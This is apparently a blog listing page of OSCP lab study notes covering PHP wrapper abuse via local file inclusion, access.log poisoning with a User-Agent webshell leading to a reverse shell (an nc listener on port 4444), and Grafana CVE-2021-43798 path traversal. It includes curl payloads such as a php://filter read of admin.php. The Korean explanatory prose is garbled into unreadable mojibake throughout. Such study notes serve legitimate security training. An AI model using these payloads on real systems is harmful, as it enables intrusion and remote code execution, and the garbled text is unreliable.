๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

๐ŸดCTF/OSCP3

OSCP - 9.2.2. PHP Wrappers kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance.Listing 21 - Contents of the admin.php file ๋‹ค์Œ๊ณผ ๊ฐ™์ด LFI๊ฐ€ ๋ฐœ์ƒํ•˜๋Š” ๊ฒฝ์šฐ(์ž…๋ ฅ ๊ฒ€์ฆ ์—†์ด ๋ฐ”๋กœ include ์‹คํ–‰ => include $_GET["page"];)PHP Wrappers์— ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ๋‹ค. kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php.. 2025. 7. 21.
OSCP - 9.2. File Inclusion Vulnerabilities, Labs Local File Inclusion (LFI) ๋ฐ access.log ํฌ์ด์ฆˆ๋‹ ์ทจ์•ฝ์  access.log ํฌ์ด์ฆˆ๋‹(์˜ค์—ผ)User-Agent ํ—ค๋”์— ํ•œ์ค„ ์งœ๋ฆฌ ์›น์‰˜ ์ฝ”๋“œ๋ฅผ ๋„ฃ๋Š”๋‹ค. ์ดํ›„ ์„œ๋ฒ„๋กœ ๋ถ€ํ„ฐ ์š”์ฒญ์ด ๊ฐ€๊ฒŒ ๋˜๋ฉด ์„œ๋ฒ„ ์ธก์— ์•„ํŒŒ์น˜ ๋กœ๊ทธ ํŒŒ์ผ์ธ /var/log/apache2/access.log(์œˆ๋„์šฐ ์˜ˆ์‹œ: C:\xampp\apache\logs\access.log)์—๋Š” ์‚ฌ์šฉ์ž์˜ ๋ฐฉ๋ฌธ ์ •๋ณด(์•„์ดํ”ผ ์ฃผ์†Œ, ๊ฒฝ๋กœ, User-Agent)๊ฐ€ ๋‚จ๊ฒŒ ๋œ๋‹ค. ์ด์ œ LFI ์ทจ์•ฝ์ ์ด ์žˆ๋Š” ํŒŒ๋ผ๋ฏธํ„ฐ์—๋‹ค /var/log/apache2/access.log๋ฅผ ์ž…๋ ฅ์„ ํ•ด ํŒŒ์ผ์„ ์ฝ์–ด ์˜ค๊ฒŒ ๋˜๋ฉด์„œ ํ•ด๋‹น PHP ์ฝ”๋“œ๊ฐ€ ์‹คํ–‰๋˜๋ฉด์„œ ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ ์ทจ์•ฝ์ด ๋ฐœ์ƒํ•œ๋‹ค. (*cmd ํŒŒ๋ผ๋ฏธํ„ฐ ์•ž์—๋Š” ?๊ฐ€ ์•„๋‹Œ &์ด ์˜ฌ ๊ฒƒ) nc -nvlp 4444์ข€ ๋” ์›ํ™œํ•œ ์ œ์–ด๋ฅผ ์œ„ํ•œ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๋Š” ๋ฆฌ๋ฒ„์Šค์‰˜์„ ์—ด์–ด ๋Œ€์ƒ ์„œ๋ฒ„๊ฐ€ ์—ฐ๊ฒฐ์„.. 2025. 7. 21.
OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is ์ทจ์•ฝ์  ๊ฐœ์š”Grafana 8.x ๋ฒ„์ „์—์„œ ๋ฐœ์ƒ ํ•˜๋Š” Path Traversal ์ทจ์•ฝ์ ์ด๋‹ค. ํ”Œ๋Ÿฌ๊ทธ์ธ API ์—”๋“œํฌ์ธํŠธ์˜ ๊ฒฝ๋กœ์— ๋Œ€ํ•œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ๋ฏธํกํ•˜์—ฌ ์„œ๋น„์Šค ์˜์—ญ ์™ธ์˜ ์ƒ์œ„ ๋””๋ ‰ํ„ฐ๋ฆฌ ๋“ฑ์— ์•ก์„ธ์Šค๊ฐ€ ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋œ๋‹ค. ๋ฌธ์ œ์˜ ์ฝ”๋“œ : https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284 ์ฐธ๊ณ https://github.com/taythebot/CVE-2021-43798 GitHub - taythebot/CVE-2021-43798: CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)CVE-2021-43798 - Grafan.. 2025. 7. 21.
728x90